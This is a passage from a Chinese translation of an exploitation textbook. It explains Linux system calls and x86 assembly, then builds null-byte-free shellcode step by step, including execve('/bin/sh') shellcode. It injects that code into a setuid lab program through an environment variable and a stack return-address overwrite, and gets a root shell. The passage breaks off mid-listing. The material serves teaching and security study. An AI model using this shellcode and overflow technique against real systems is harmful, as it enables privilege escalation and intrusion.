read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20Z\1\000"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1248904, ...}) = 0
mmap2(NULL, 1258876, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7db3000
mmap2(0xb7ee0000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3,
 0x12c) =
0xb7ee0000
mmap2(0xb7ee4000, 9596, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) =

0xb7ee4000
close(3)                                = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7db2000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7db26b0, limit:1048575, seg_32bit:1,
contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
mprotect(0xb7ee0000, 8192, PROT_READ)   = 0
munmap(0xb7ee7000, 61323)               = 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef5000
`write(1, "Hello, world!\n", 13Hello, world! )          = 13`
exit_group(0)                           = ?
Process 11528 detached
reader@hacking:~/booksrc $

如您所见，编译后的程序不仅仅是打印一个字符串。开始处的系统调用是在设置程序的环境和内存，但重要的是显示在粗体中的 write() 系统调用。这正是实际输出字符串的地方。

Unix 手册页（通过 man 命令访问）分为几个部分。第二部分包含系统调用手册页，因此 man 2 write 将描述 write() 系统调用的用法：

`write()` 系统调用手册页

WRITE(2)                   Linux Programmer's Manual
WRITE(2)

NAME
       write - write to a file descriptor

SYNOPSIS
       #include <unistd.h>

       ssize_t write(int fd, const void *buf, size_t count);

DESCRIPTION
       write() writes up to count bytes to the file referenced by the file
       descriptor fd from the buffer starting at buf. POSIX requires that a
       read() which can be proved to occur after a write() returns the new
       data. Note that not all file systems are POSIX conforming.

strace 输出还显示了系统调用的参数。buf 和 count 参数是指向我们的字符串及其长度的指针。fd 参数的 1 是一个特殊的标准文件描述符。文件描述符在 Unix 中用于几乎所有事情：输入、输出、文件访问、网络套接字等。文件描述符类似于在衣帽间领取的号码。打开文件描述符就像登记你的大衣，因为你得到了一个可以后来用来引用你的大衣的号码。前三个文件描述符号码（0、1 和 2）自动用于标准输入、输出和错误。这些值是标准的，并在多个地方定义过，例如在下一页的 /usr/include/unistd.h 文件中。

来自 /usr/include/unistd.h

/* Standard file descriptors. */
#define STDIN_FILENO  0 /* Standard input.  */
#define STDOUT_FILENO 1 /* Standard output.  */
#define STDERR_FILENO 2 /* Standard error output. */

将字节写入标准输出的文件描述符 1 将打印字节；从标准输入的文件描述符 0 读取将输入字节。标准错误文件描述符 2 用于显示可以从标准输出过滤的错误或调试消息。

Linux 系统调用汇编

列出了所有可能的 Linux 系统调用，以便在汇编调用时可以通过数字引用它们。这些系统调用在 /usr/include/asm-i386/unistd.h 中列出。

来自 /usr/include/asm-i386/unistd.h

#ifndef _ASM_I386_UNISTD_H_
#define _ASM_I386_UNISTD_H_

/*
 * This file contains the system call numbers.
 */

#define __NR_restart_syscall      0
`#define __NR_exit       1`
#define __NR_fork       2
#define __NR_read       3
`#define __NR_write      4`
#define __NR_open       5
#define __NR_close      6
#define __NR_waitpid    7
#define __NR_creat      8
#define __NR_link       9
#define __NR_unlink    10
#define __NR_execve    11
#define __NR_chdir     12
#define __NR_time      13
#define __NR_mknod     14
#define __NR_chmod     15
#define __NR_lchown    16
#define __NR_break     17
#define __NR_oldstat   18
#define __NR_lseek     19
#define __NR_getpid    20
#define __NR_mount     21
#define __NR_umount    22
#define __NR_setuid    23
#define __NR_getuid    24
#define __NR_stime     25
#define __NR_ptrace    26
#define __NR_alarm     27
#define __NR_oldfstat  28
#define __NR_pause     29
#define __NR_utime     30
#define __NR_stty      31
#define __NR_gtty      32
#define __NR_access    33
#define __NR_nice      34
#define __NR_ftime     35
#define __NR_sync      36
#define __NR_kill      37
#define __NR_rename    38
#define __NR_mkdir     39
...

对于我们用汇编重写的 helloworld.c，我们将对 write() 函数进行系统调用以输出，然后对 exit() 函数进行第二次系统调用，以便进程干净地退出。这可以在 x86 汇编中使用仅两个汇编指令来完成：mov 和 int。

x86 处理器的汇编指令有一个、两个、三个或没有操作数。指令的操作数可以是数值、内存地址或处理器寄存器。x86 处理器有几个 32 位寄存器，可以视为硬件变量。EAX、EBX、ECX、EDX、ESI、EDI、EBP 和 ESP 寄存器都可以用作操作数，而 EIP 寄存器（执行指针）不能。

mov 指令在两个操作数之间复制一个值。使用英特尔汇编语法，第一个操作数是目标，第二个是源。int 指令向内核发送一个中断信号，由其单个操作数定义。在 Linux 内核中，中断 0x80 用于告诉内核执行系统调用。当执行 int 0x80 指令时，内核将根据前四个寄存器执行系统调用。EAX 寄存器用于指定要执行哪个系统调用，而 EBX、ECX 和 EDX 寄存器用于保存系统调用的第一个、第二个和第三个参数。所有这些寄存器都可以使用 mov 指令设置。

在下面的汇编代码列表中，内存段被简单地声明。带有换行符（0x0a）的字符串"Hello, world!"在数据段中，实际的汇编指令在文本段中。这遵循了正确的内存分段实践。

helloworld.asm

section .data       ;  Data segment
msg     db      "Hello,  world!", 0x0a   ;  The string and newline char

section .text       ; Text segment
global _start       ; Default entry point for ELF linking

_start:

; SYSCALL: write(1, msg, 14)
mov eax, 4        ; Put 4 into eax, since write is syscall #4.
mov ebx, 1        ; Put 1 into ebx, since stdout is 1.
mov ecx, msg      ; Put the address of the string into ecx.
mov edx, 14       ; Put 14 into edx, since our string is 14 bytes.
int 0x80          ; Call the kernel to make the system call happen.

; SYSCALL: exit(0)
mov eax, 1        ; Put 1 into eax, since exit is syscall #1.
mov ebx, 0        ; Exit with success.
int 0x80          ; Do the syscall.

这个程序的说明非常直接。对于写入标准输出的write()系统调用，将4的值放入 EAX，因为write()函数是系统调用号 4。然后，将1的值放入 EBX，因为write()的第一个参数应该是标准输出的文件描述符。接下来，将数据段中字符串的地址放入 ECX，并将字符串的长度（在这种情况下，14 个字节）放入 EDX。在这些寄存器被加载后，触发系统调用中断，这将调用write()函数。

为了干净地退出，需要用单个参数0调用exit()函数。因此，将1的值放入 EAX，因为exit()是系统调用号 1，将0的值放入 EBX，因为第一个且唯一的参数应该是 0。然后再次触发系统调用中断。

要创建一个可执行二进制文件，这个汇编代码必须首先被汇编，然后链接成可执行格式。当编译 C 代码时，GCC 编译器会自动处理所有这些。我们将创建一个可执行和链接格式（ELF）的二进制文件，所以global _start行告诉链接器汇编指令的开始位置。

使用-f elf参数的nasm汇编器将helloworld.asm汇编成一个准备链接为 ELF 二进制的目标文件。默认情况下，这个目标文件将被称为helloworld.o。链接程序 ld 将从汇编的目标文件生成可执行的a.out二进制文件。

reader@hacking:~/booksrc $ nasm -f elf helloworld.asm
reader@hacking:~/booksrc $ ld helloworld.o
reader@hacking:~/booksrc $ ./a.out
Hello, world!
reader@hacking:~/booksrc $

这个小程序可以工作，但它不是 shellcode，因为它不是自包含的，必须进行链接。

到 Shellcode 的路径

Shellcode 实际上是注入到一个正在运行的程序中，就像生物病毒在细胞内一样接管。由于 shellcode 实际上不是一个可执行程序，我们没有声明内存中数据布局或使用其他内存段的便利。我们的指令必须是自包含的，并且准备好无论处理器的当前状态如何都能接管处理器控制。这通常被称为位置无关代码。

在 shellcode 中，字符串"Hello, world!"的字节必须与汇编指令的字节混合在一起，因为不存在可定义或可预测的内存段。只要 EIP 不尝试将字符串解释为指令，这就可以了。然而，为了将字符串作为数据访问，我们需要一个指向它的指针。当 shellcode 被执行时，它可能在内存中的任何位置。需要计算字符串的绝对内存地址，相对于 EIP。然而，由于 EIP 不能从汇编指令中访问，因此我们需要使用某种技巧。

使用堆栈的汇编指令

栈对于x86 架构来说是如此重要，以至于有专门的指令用于其操作。

指令	描述
`push <source>`	将源操作数压入栈中。
`pop <destination>`	从栈中弹出一个值并将其存储在目标操作数中。
`call <location>`	调用一个函数，将执行跳转到位置操作数中的地址。这个位置可以是相对的或绝对的。调用之后的指令地址被压入栈中，以便稍后执行返回。
`ret`	从函数返回，从栈中弹出返回地址并跳转到那里执行。

基于栈的漏洞利用是由call和ret指令实现的。当一个函数被调用时，下一条指令的返回地址被压入栈中，开始栈帧。函数执行完毕后，ret指令从栈中弹出返回地址并跳转 EIP 回到那里。通过在ret指令之前覆盖存储在栈上的返回地址，我们可以控制程序的执行。

这种架构可以通过另一种方式被滥用来解决内联字符串数据寻址的问题。如果字符串直接放置在调用指令之后，字符串的地址将作为返回地址被压入栈中。而不是调用一个函数，我们可以跳过字符串到一个pop指令，该指令将从栈中取出地址并放入寄存器。下面的汇编指令展示了这种技术。

helloworld1.s

BITS 32             ;  Tell nasm this is 32-bit code.

  call mark_below   ;  Call below the string to instructions
  db "Hello, world!",  0x0a, 0x0d  ; with newline and carriage return bytes.

mark_below:
; ssize_t write(int fd,  const void *buf, size_t count);
  pop ecx           ; Pop  the return address (string ptr) into ecx.
  mov eax, 4        ; Write  syscall #.
  mov ebx, 1        ; STDOUT  file descriptor
  mov edx, 15       ; Length of the string
  int 0x80          ; Do syscall: write(1, string, 14)

; void _exit(int status);
  mov eax, 1        ; Exit syscall #
  mov ebx, 0        ; Status = 0
  int 0x80          ; Do syscall:  exit(0)

调用指令将执行跳转到字符串下方。这也将下一条指令的地址压入栈中，在我们的例子中是字符串的开始。返回地址可以立即从栈中弹出并放入适当的寄存器。不使用任何内存段，这些原始指令注入到现有进程中将以完全位置无关的方式执行。这意味着，当这些指令被汇编时，它们不能被链接到可执行文件中。

reader@hacking:~/booksrc $ nasm helloworld1.s
reader@hacking:~/booksrc $ ls -l helloworld1
-rw-r--r-- 1 reader reader 50 2007-10-26 08:30 helloworld1
reader@hacking:~/booksrc $ hexdump -C helloworld1
00000000  e8 0f 00 00 00 48 65 6c  6c 6f 2c 20 77 6f 72 6c  |.....Hello, worl|
00000010  64 21 0a 0d 59 b8 04 00  00 00 bb 01 00 00 00 ba  |d!..Y...........|
00000020  0f 00 00 00 cd 80 b8 01  00 00 00 bb 00 00 00 00  |................|
00000030  cd 80                                             |..|
00000032
reader@hacking:~/booksrc $ ndisasm -b32 helloworld1
00000000  E80F`000000`        call 0x14
00000005  48                dec eax
00000006  656C              gs insb
00000008  6C                insb
00000009  6F                outsd
0000000A  2C20              sub al,0x20
0000000C  776F              ja 0x7d
0000000E  726C              jc 0x7c
00000010  64210A            and [fs:edx],ecx
00000013  0D59B80400        or eax,0x4b859
00000018  0000              add [eax],al
0000001A  BB01000000        mov ebx,0x1
0000001F  BA0F000000        mov edx,0xf
00000024  CD80              int 0x80
00000026  B801000000        mov eax,0x1
0000002B  BB00000000        mov ebx,0x0
00000030  CD80              int 0x80
reader@hacking:~/booksrc $

nasm汇编器将汇编语言转换为机器代码，一个相应的工具 ndisasm 将机器代码转换为汇编。这些工具在上文中用于显示机器代码字节和汇编指令之间的关系。加粗的解汇编指令是将"Hello, world!"字符串解释为指令的字节。

现在，如果我们能将这个 shellcode 注入到一个程序中并重定向 EIP，程序将打印出Hello, world!让我们使用笔记搜索程序的熟悉漏洞目标。

reader@hacking:~/booksrc $ export SHELLCODE=$(cat helloworld1)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9c6
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xc6\xf9\xff\xbf"x40')
-------[ end of note data ]-------
Segmentation fault
reader@hacking:~/booksrc $

失败。你认为它为什么会崩溃？在这种情况下，GDB 是你的最佳朋友。即使你已经知道这次崩溃背后的原因，学习如何有效地使用调试器将有助于你解决未来的许多其他问题。

使用 GDB 进行调试

由于 notesearch 程序以 root 身份运行，我们无法以普通用户身份对其进行调试。然而，我们也不能直接附加到正在运行的副本上，因为它退出得太快了。另一种调试程序的方法是使用核心转储。从 root 提示符开始，可以使用命令 ulimit -c unlimited 告诉操作系统在程序崩溃时转储内存。这意味着转储的核心文件可以变得任意大。现在，当程序崩溃时，内存将作为核心文件转储到磁盘上，可以使用 GDB 进行检查。

reader@hacking:~/booksrc $ sudo su
root@hacking:/home/reader/booksrc # ulimit -c unlimited
root@hacking:/home/reader/booksrc # export SHELLCODE=$(cat helloworld1)
root@hacking:/home/reader/booksrc # ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9a3
root@hacking:/home/reader/booksrc # ./notesearch $(perl -e 'print "\xa3\xf9\
xff\xbf"x40')
-------[ end of note data ]-------
Segmentation fault (core dumped)
root@hacking:/home/reader/booksrc # ls -l ./core
-rw------- 1 root root 147456 2007-10-26 08:36 ./core
root@hacking:/home/reader/booksrc # gdb -q -c ./core
(no debugging symbols found)
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
Core was generated by './notesearch
£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E.
Program terminated with signal 11, Segmentation fault.
#0  0x2c6541b7 in ?? ()
(gdb) set dis intel
(gdb) x/5i 0xbffff9a3
0xbffff9a3:     call   0x2c6541b7
0xbffff9a8:     ins    BYTE PTR es:[edi],[dx]
0xbffff9a9:     outs   [dx],DWORD PTR ds:[esi]
0xbffff9aa:     sub    al,0x20
0xbffff9ac:     ja     0xbffffa1d
(gdb) i r eip
eip            0x2c6541b7        0x2c6541b7
(gdb) x/32xb 0xbffff9a3
0xbffff9a3:     0xe8    0x0f    0x48    0x65    0x6c    0x6c    0x6f    0x2c
0xbffff9ab:     0x20    0x77    0x6f    0x72    0x6c    0x64    0x21    0x0a
0xbffff9b3:     0x0d    0x59    0xb8    0x04    0xbb    0x01    0xba    0x0f
0xbffff9bb:     0xcd    0x80    0xb8    0x01    0xbb    0xcd    0x80    0x00
(gdb) quit
root@hacking:/home/reader/booksrc # hexdump -C helloworld1
00000000  e8 0f 00 00 00 48 65 6c  6c 6f 2c 20 77 6f 72 6c  |.....Hello, worl|
00000010  64 21 0a 0d 59 b8 04 00  00 00 bb 01 00 00 00 ba  |d!..Y...........|
00000020  0f 00 00 00 cd 80 b8 01  00 00 00 bb 00 00 00 00  |................|
00000030  cd 80                                             |..|
00000032
root@hacking:/home/reader/booksrc #

一旦加载 GDB，反汇编风格将切换到 Intel 格式。由于我们以 root 身份运行 GDB，因此不会使用 .gdbinit 文件。将检查放置 shellcode 的内存。指令看起来不正确，但似乎第一个错误的调用指令导致了崩溃。至少，执行被重定向了，但 shellcode 字节出了问题。通常，字符串以空字节结尾，但这里，shell 仁慈地为我们移除了这些空字节。然而，这完全破坏了机器代码的意义。通常，shellcode 会作为字符串注入到进程，使用像 strcpy() 这样的函数。这样的函数会在第一个空字节处终止，产生不完整且不可用的 shellcode。为了使 shellcode 能够在传输过程中存活，它必须被重新设计，以确保不包含任何空字节。

移除空字节

查看反汇编代码，很明显，第一个空字节来自 call 指令。

reader@hacking:~/booksrc $ ndisasm -b32 helloworld1
00000000  E80F`000000`        call 0x14
00000005  48                dec eax
00000006  656C              gs insb
00000008  6C                insb
00000009  6F                outsd
0000000A  2C20              sub al,0x20
0000000C  776F              ja 0x7d
0000000E  726C              jc 0x7c
00000010  64210A            and [fs:edx],ecx
00000013  0D59B80400        or eax,0x4b859
00000018  0000              add [eax],al
0000001A  BB01000000        mov ebx,0x1
0000001F  BA0F000000        mov edx,0xf
00000024  CD80              int 0x80
00000026  B801000000        mov eax,0x1
0000002B  BB00000000        mov ebx,0x0
00000030  CD80              int 0x80
reader@hacking:~/booksrc $

该指令根据第一个操作数将执行跳转前进了 19 (0x13) 个字节。call 指令允许更长的跳转距离，这意味着像 19 这样的小值需要用前导零填充，从而产生空字节。

解决这个问题的方法之一是利用二进制补码。一个小负数将它的前导位设置为 1，从而得到 0xff 字节。这意味着，如果我们使用负值来向后移动执行，该指令的机器代码将不会包含任何空字节。以下 helloworld shellcode 的修订版本使用了这种技巧的标准实现：跳转到 shellcode 的末尾到一个调用指令，然后该调用指令会跳转回 shellcode 开头的 pop 指令。

helloworld2.s

BITS 32             ;  Tell nasm this is 32-bit code.

`jmp short one       ;  Jump down to a call at the end.  two:`
; ssize_t write(int fd,  const void *buf, size_t count);
  pop ecx           ;  Pop the return address (string ptr) into ecx.
  mov eax, 4        ;  Write syscall #.
  mov ebx, 1        ;  STDOUT file descriptor
  mov edx, 15       ;  Length of the string
  int 0x80          ;  Do syscall: write(1, string, 14)

; void _exit(int status);
  mov eax, 1        ; Exit syscall #
  mov ebx, 0        ; Status = 0
  int 0x80          ; Do syscall: exit(0)

`one:   call two   ; Call back upwards to avoid null bytes   db "Hello, world!", 0x0a, 0x0d ; with newline and carriage return bytes.`

在组装这个新的 shellcode 之后，反汇编显示，调用指令（如下所示，用斜体表示）现在没有空字节了。这解决了这个 shellcode 的第一个也是最难解决的问题，但仍然有许多其他的空字节（如下所示，用粗体表示）。

reader@hacking:~/booksrc $ nasm helloworld2.s
reader@hacking:~/booksrc $ ndisasm -b32 helloworld2
00000000  EB1E              jmp short 0x20
00000002  59                pop ecx
00000003  B804`000000`        mov eax,0x4
00000008  BB01`000000`        mov ebx,0x1
0000000D  BA0F`000000`        mov edx,0xf
00000012  CD80              int 0x80
00000014  B801`000000`        mov eax,0x1
00000019  BB`00000000`        mov ebx,0x0
0000001E  CD80              int 0x80
*`00000020  E8DDFFFFFF        call 0x2`*
00000025  48                dec eax
00000026  656C              gs insb
00000028  6C                insb
00000029  6F                outsd
0000002A  2C20              sub al,0x20
0000002C  776F              ja 0x9d
0000002E  726C              jc 0x9c
00000030  64210A            and [fs:edx],ecx
00000033  0D                db 0x0D
reader@hacking:~/booksrc $

这些剩余的空字节可以通过理解寄存器宽度和寻址来消除。注意，第一个jmp指令实际上是jmp short。这意味着执行只能向上或向下跳转最多约 128 个字节。正常的jmp指令以及调用指令（没有短版本），允许进行更长的跳转。两种跳转类型的汇编代码差异如下所示：

	EB 1E              jmp short 0x20

相对于

	E9 1E 00 00 00     jmp 0x23

EAX、EBX、ECX、EDX、ESI、EDI、EBP 和 ESP 寄存器都是 32 位宽。E代表扩展，因为这些最初是 16 位寄存器，称为 AX、BX、CX、DX、SI、DI、BP 和 SP。这些原始的 16 位寄存器版本仍然可以用来访问每个相应 32 位寄存器的第一个 16 位。此外，AX、BX、CX 和 DX 寄存器的各个字节可以作为 8 位寄存器访问，称为 AL、AH、BL、BH、CL、CH、DL 和 DH，其中L代表低字节，H代表高字节。自然地，只使用较小寄存器的汇编指令只需要指定到寄存器位宽度的操作数。下面显示了mov指令的三种变体。

机代码	汇编
`B8 04 00 00 00`	`mov eax,0x4`
`66 B8 04 00`	`mov ax,0x4`
`B0 04`	`mov al,0x4`

使用 AL、BL、CL 或 DL 寄存器可以将正确的最低有效字节放入相应的扩展寄存器中，而不会在机器代码中创建任何空字节。然而，寄存器的最高三个字节可能包含任何内容。这对于 shellcode 尤其如此，因为它将接管另一个进程。如果我们想使 32 位寄存器值正确，我们需要在mov指令之前将整个寄存器清零——但这，同样，不能使用空字节。以下是一些额外的简单汇编指令，供您使用。这些前两个是小的指令，它们将它们的操作数增加或减少 1。

指令	描述
`inc <target>`	将目标操作数增加 1。
`dec <target>`	从目标操作数中减去 1。

接下来的几条指令，如mov指令，有两个操作数。它们都在两个操作数之间执行简单的算术和位逻辑运算，并将结果存储在第一个操作数中。

指令	描述
`add <dest>, <source>`	将源操作数加到目的操作数上，并将结果存储在目的操作数中。
`sub <dest>, <source>`	从目的操作数中减去源操作数，并将结果存储在目的操作数中。

| or <dest>, <source> | 执行位或逻辑运算，比较一个操作数的每个位与另一个操作数对应位的比较。|

| 1 或 0 = 1 |

| 1 或 1 = 1 |

| 0 或 1 = 1 |

| 0 或 0 = 0 |

如果源位或目标位打开，或者两者都打开，结果位打开；否则，结果关闭。最终结果存储在目标操作数中。|

| and <dest>, <source> | 执行位运算逻辑操作，比较一个操作数的每个位与另一个操作数的对应位。

| 1 或 0 = 0 |

| 1 或 1 = 1 |

| 0 或 1 = 0 |

| 0 或 0 = 0 |

只有当源位和目标位都打开时，结果位才打开。最终结果存储在目标操作数中。|

| xor <dest>, <source> | 执行位运算排他或（xor）逻辑操作，比较一个操作数的每个位与另一个操作数的对应位。

| 1 或 0 = 1 |

| 1 或 1 = 0 |

| 0 或 1 = 1 |

| 0 或 0 = 0 |

如果位不同，结果位打开；如果位相同，结果位关闭。最终结果存储在目标操作数中。|

一种方法是将一个任意的 32 位数字移入寄存器，然后使用mov和sub指令从这个寄存器中减去该值：

	B8 44 33 22 11        mov eax,0x11223344
	2D 44 33 22 11        sub eax,0x11223344

虽然这个技术可行，但清零单个寄存器需要 10 个字节，使得汇编的 shellcode 比必要的更大。你能想到优化这个技术的方法吗？每个指令中指定的 DWORD 值占代码的 80%。从任何值中减去该值也会产生 0，并且不需要任何静态数据。这可以用一个单字节指令完成：

	29 C0               sub eax,eax

在 shellcode 开始时清零寄存器时，使用sub指令将工作良好。然而，这个指令会修改处理器标志，这些标志用于分支。因此，有一个首选的双字节指令，在大多数 shellcode 中用于清零寄存器。xor指令在寄存器的位上执行一个排他或（xor）操作。由于 1 xor 1 的结果是 0，0 xor 0 的结果也是 0，任何与自身xor的值都将得到 0。这与从自身减去任何值得到的结果相同，但xor指令不会修改处理器标志，因此被认为是一种更干净的方法。

	31 C0                 xor eax,eax

你可以安全地使用sub指令来清零寄存器（如果是在 shellcode 的开始处执行），但xor指令在野外的 shellcode 中最为常用。这个 shellcode 的下一个版本利用了较小的寄存器和xor指令来避免空字节。在可能的情况下，也使用了inc和dec指令，以使 shellcode 更小。

helloworld3.s

BITS 32             ;  Tell nasm this is 32-bit code.

jmp short one       ;  Jump down to a call at the end.

two:
; ssize_t write(int fd,  const void *buf, size_t count);
  pop ecx           ; Pop  the return address (string ptr) into ecx.
  xor eax, eax      ; Zero  out full 32 bits of eax register.
  mov al, 4         ; Write  syscall #4 to the low byte of eax.
  xor ebx, ebx      ; Zero out ebx.
  inc ebx           ; Increment ebx to 1,  STDOUT file descriptor.
  xor edx, edx
  mov dl, 15        ; Length of the string
  int 0x80          ; Do syscall: write(1, string, 14)

; void _exit(int status);
  mov al, 1        ; Exit syscall #1, the top 3 bytes are still zeroed.
  dec ebx          ; Decrement ebx back down to 0 for status = 0.
  int 0x80         ; Do syscall: exit(0)

one:
  call two   ; Call back upwards to avoid null bytes
  db "Hello, world!", 0x0a, 0x0d  ; with newline and carriage return bytes.

在汇编这个 shellcode 之后，使用 hexdump 和 grep 来快速检查它是否有空字节。

reader@hacking:~/booksrc $ nasm helloworld3.s
reader@hacking:~/booksrc $ hexdump -C helloworld3 | grep --color=auto 00
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 0f cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 48 65 6c 6c 6f 2c  |..K.......Hello,|
00000020  20 77 6f 72 6c 64 21 0a  0d                       | world!..|
00000029
reader@hacking:~/booksrc $

现在这个 shellcode 可以使用了，因为它不包含任何空字节。当与漏洞利用程序一起使用时，notesearch 程序被强制以新手的身份问候世界。

reader@hacking:~/booksrc $ export SHELLCODE=$(cat helloworld3)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9bc
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xbc\xf9\xff\xbf"x40')
[DEBUG] found a 33 byte note for user id 999
-------[ end of note data ]-------
Hello, world!
reader@hacking :~/booksrc $

Shell-Spawning Shellcode

现在你已经学会了如何进行系统调用并避免空字节，可以构建各种 shellcode。要启动一个 shell，我们只需要调用系统调用来执行/bin/sh shell 程序。系统调用号 11，execve()，与我们在前几章中使用的 C 语言execute()函数类似。

EXECVE(2)                  Linux Programmer's Manual                 EXECVE(2)

NAME
       execve - execute program

SYNOPSIS
       #include <unistd.h>

       int execve(const char *filename, char *const argv[],
                  char *const envp[]);

DESCRIPTION
       execve() executes the program pointed to by filename. Filename must be
       either a binary executable, or a script starting with a line of  the
       form  "#! interpreter [arg]". In the latter case, the interpreter must
       be a valid pathname for an executable which is not itself a  script,
       which will be invoked as interpreter [arg] filename.

       argv is an array of argument strings passed to the new program. envp
       is an array of strings, conventionally of the form key=value, which are
       passed as environment to the new program. Both argv and envp must be
       terminated by a null pointer. The argument vector and environment can
       be accessed by the called program's main function, when it is defined
       as int main(int argc, char *argv[], char *envp[]).

文件名的前一个参数应该是字符串"/bin/sh"的指针，因为这是我们想要执行的。环境数组（第三个参数）可以空，但仍需要以 32 位空指针结尾。参数数组（第二个参数）也必须是 null 终止的；它还必须包含字符串指针（因为零参数是正在运行的程序的名字）。在 C 中完成这个调用，程序看起来会是这样：

Shell 启动 Shellcode

exec_shell.c

#include <unistd.h>

int main() {
  char filename[] = "/bin/sh\x00";
  char **argv, **envp; // Arrays that contain char pointers

  argv[0] = filename; // The only argument is filename.
  argv[1] = 0;  // Null terminate the argument array.

  envp[0] = 0; // Null terminate the environment array.

  execve(filename, argv, envp);
}

在汇编中做这件事，需要在内存中构建参数数组和环境数组。此外，"/bin/sh"字符串需要以空字节结尾。这也必须在内存中构建。在汇编中处理内存类似于在 C 中使用指针。lea指令，其名称代表加载有效地址，在 C 中类似于address-of运算符。

指令	描述
`lea <dest>, <source>`	将源操作数的有效地址加载到目标操作数。

使用 Intel 汇编语法，如果操作数被方括号包围，则可以作为指针解引用。例如，汇编中的以下指令将把 EBX+12 作为指针处理，并将eax写入它所指向的位置。

	89 43 0C             mov [ebx+12],eax

以下 shellcode 使用这些新指令在内存中构建execve()参数。环境数组被折叠到参数数组的末尾，因此它们共享同一个 32 位空终止符。

exec_shell.s

BITS 32

  jmp short two     ; Jump down to the bottom for the call trick.
one:
; int execve(const char *filename, char *const argv [], char *const envp[])
  pop ebx           ; Ebx has the addr of the string.
  xor eax, eax      ; Put 0 into eax.
  mov [ebx+7], al   ; Null terminate the /bin/sh string.
  mov [ebx+8], ebx  ; Put addr from ebx where the AAAA is.
  mov [ebx+12], eax ; Put 32-bit null terminator where the BBBB is.
  `lea ecx, [ebx+8]  ; Load the address of [ebx+8] into ecx for argv ptr.`
  lea edx, [ebx+12] ; Edx = ebx + 12, which is the envp ptr.
  mov al, 11        ; Syscall #11
  int 0x80          ; Do it.

two:
  call one          ; Use a call to get string address.
  db '/bin/shXAAAABBBB'     ; The XAAAABBBB bytes aren't needed.

在终止字符串并构建数组之后，shellcode 使用lea指令（如上所示加粗）将参数数组的指针放入 ECX 寄存器。将一个加值后的括号寄存器的有效地址加载是一个高效地将值加到寄存器并将结果存储在另一个寄存器中的方法。在上面的例子中，括号将 EBX+8 作为lea的参数，将这个地址加载到 EDX。加载一个解引用指针的地址会产生原始指针，因此这个指令将 EBX+8 放入 EDX。通常，这需要mov和add指令。当汇编时，这个 shellcode 不包含空字节。当用于漏洞利用时，它将启动一个 shell。

reader@hacking:~/booksrc $ nasm exec_shell.s
reader@hacking:~/booksrc $ wc -c exec_shell
36 exec_shell
reader@hacking:~/booksrc $ hexdump -C exec_shell
00000000  eb 16 5b 31 c0 88 43 07  89 5b 08 89 43 0c 8d 4b  |..[1..C..[..C..K|
00000010  08 8d 53 0c b0 0b cd 80  e8 e5 ff ff ff 2f 62 69  |..S........../bi|
00000020  6e 2f 73 68                                       |n/sh|
00000024
reader@hacking:~/booksrc $ export SHELLCODE=$(cat exec_shell)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9c0
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xc0\xf9\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
[DEBUG] found a 9 byte note for user id 999
[DEBUG] found a 33 byte note for user id 999
-------[ end of note data ]-------
sh-3.2# whoami
root
sh-3.2#

然而，这个 shellcode 可以缩短到当前 45 字节以下。由于 shellcode 需要注入到程序内存的某个地方，较小的 shellcode 可以在更紧凑的利用情况下使用较小的可用缓冲区。shellcode 越小，可以使用的场景就越多。显然，可以从字符串末尾剪掉XAAAABBBB这种视觉辅助工具，将 shellcode 缩短到 36 字节。

reader@hacking:~/booksrc/shellcodes $ hexdump -C exec_shell
00000000  eb 16 5b 31 c0 88 43 07  89 5b 08 89 43 0c 8d 4b  |..[1..C..[..C..K|
00000010  08 8d 53 0c b0 0b cd 80  e8 e5 ff ff ff 2f 62 69  |..S........../bi|
00000020  6e 2f 73 68                                       |n/sh|
00000024
reader@hacking:~/booksrc/shellcodes $ wc -c exec_shell
36 exec_shell
reader@hacking:~/booksrc/shellcodes $

这个 shellcode 可以通过重新设计并更有效地使用寄存器来进一步缩小。ESP 寄存器是栈指针，指向栈顶。当值被推入栈时，ESP 在内存中向上移动（通过减去 4），值被放置在栈顶。当值从栈中弹出时，ESP 中的指针在内存中向下移动（通过加上 4）。

以下 shellcode 使用push指令在内存中构建execve()系统调用所需的必要结构。

tiny_shell.s

BITS 32

; execve(const char *filename, char *const argv [], char *const envp[])
  xor eax, eax      ; Zero out eax.
  push eax          ; Push some nulls for string termination.
  push 0x68732f2f   ; Push "//sh" to the stack.
  push 0x6e69622f   ; Push "/bin" to the stack.
  mov ebx, esp      ; Put the address of "/bin//sh" into ebx, via esp.
  push eax          ; Push 32-bit null terminator to stack.
  mov edx, esp      ; This is an empty array for envp.
